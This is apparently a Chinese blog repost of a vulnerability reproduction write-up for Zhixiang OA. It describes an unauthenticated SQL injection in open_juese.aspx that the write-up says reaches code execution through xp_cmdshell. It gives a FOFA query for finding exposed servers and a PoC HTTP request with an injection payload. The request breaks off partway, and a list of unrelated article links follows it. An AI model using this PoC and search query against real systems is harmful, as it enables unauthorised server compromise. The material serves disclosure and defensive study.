当前位置: 首页 > article >正文

致翔OA open_juese.aspx SQL注入致RCE漏洞复现

0x01 产品简介

致翔OA是由广州致翔计算机科技有限公司(及其深圳分公司)开发的一款集成多个行业应用功能的OA协同办公平台。致翔OA支持为企事业单位、教育机构、政府机构等多个行业提供协同办公解决方案。每个行业版本都针对该行业的特定需求进行了优化,如企业版集成了CRM、销售、生产管理、HR和项目管理等功能;教育版则集成了教务、行政、后勤、总务、招生、财务、学生成长、教师成长、家校互动等功能。

0x02 漏洞概述

致翔OA open_juese.aspx 接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

0x03 复现环境

FOFA:app="致翔软件-致翔OA"

0x04 漏洞复现

PoC

GET /OpenWindows/open_juese.aspx?key=1&name=1&user=-1)+and+1=@@VERSION--+&requeststr= HTTP/1.1
Host: 
User-Agent: Mo

http://www.kler.cn/a/409783.html

相关文章:

  • 详细教程-Linux上安装单机版的Hadoop
  • LLaMA-Mesh: Unifying 3D Mesh Generation with Language Models 论文解读
  • 非常简单实用的前后端分离项目-仓库管理系统(Springboot+Vue)part 2
  • 探索 Vue的nextTick :原理剖析、使用场景及代码实践详解
  • linux ubuntu的脚本知
  • python如何解压缩文件或文件夹
  • 算法分析 —— 《位运算基础》
  • JavaScript中的Observer模式:设计模式与最佳实践
  • 赛氪媒体支持“2024科普中国青年之星创作交流活动”医学专场落幕
  • BIO/NIO
  • 后端开发入门
  • 游卡,科锐国际,蓝禾,汤臣倍健,三七互娱,顺丰,快手,途游游戏25秋招内推
  • Oracle-索引的创建和优化
  • 学习prompt
  • GitLab|GitLab报错:Restoring PostgreSQL database gitlabhq_production...
  • HTML密码小眼睛
  • 区块链学习笔记(1)--区块、链和共识 区块链技术入门
  • 【分治】--- 快速选择算法
  • 【优选算法】前缀和
  • C++入门学习基础
  • C++ 编程指南06 - 不要泄漏任何资源
  • 蓝桥杯每日真题 - 第23天
  • 【C++】C++11新特性详解:可变参数模板与emplace系列的应用
  • World of Warcraft /script SetRaidTarget(“target“, n, ““) n=8,7,6,5,4,3,2,1,0
  • 深入探讨异步 API 的设计与实现
  • [C++]了解内置类型升级